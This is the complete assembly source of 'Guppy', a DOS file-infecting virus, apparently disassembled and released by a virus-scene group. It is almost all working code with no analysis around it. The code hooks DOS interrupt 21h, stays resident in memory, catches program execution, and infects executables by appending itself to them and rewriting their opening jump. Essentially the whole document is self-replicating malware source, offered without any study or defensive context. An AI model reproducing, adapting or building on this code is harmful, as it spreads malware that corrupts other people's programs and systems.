Guppy
;
--------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
;
--------------------------------------------------------------------------
.model tiny
.radix 16
.code
org 100h
start:
call Get_Offset
Get_Offset:
pop si
mov ax,3521h
mov bx,ax
int 21h
mov ds:[si+Int_21_Offset-103],bx
mov ds:[si+Int_21_Segment-103],es
;mov dx,si
db 89,0f2
db 83,0c2,1f
mov ah,25h
int 21h
inc dh
push cs
pop es
int 27h
Int_21_Handler:
cmp ax,4B00h
je Infect
cmp al,21h
jne Go_Int_21
;cmp ax,bx
db 39,0d8
jne Go_Int_21
push word ptr [si+3dh]
mov bx,offset ds:[100]
pop word ptr [bx]
mov cl,[si+3Fh]
mov [bx+2],cl
Restore_Control:
pop cx
push bx
iret
Storage_Bytes db 0, 0, 0
Infect:
push ax
push bx
push dx
push ds
mov ax,3D02h
int 21h
xchg ax,bx
call Get_Offset_Two
Get_Offset_Two:
pop si
push cs
pop ds
mov ah,3F
mov cx,3
sub si,10
db 89,0f2
int 21h
cmp byte ptr [si],0E9h
jne Close_File
mov ax,4202h
xor dx,dx
xor cx,cx
int 21h
xchg ax,di
mov ah,40h
mov cl,98h
;mov dx,si
db 89,0f2
sub dx,40h
int 21h
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
mov cl,3
;sub di,cx
db 29,0cf
mov [si+1],di
mov ah,40h
;mov dx,si
db 89,0f2
int 21h
Close_File:
mov ah,3Eh
int 21h
pop ds
pop dx
pop bx
pop ax
Go_Int_21:
db 0EAh
Int_21_Offset dw ?
Int_21_Segment dw ?
end start
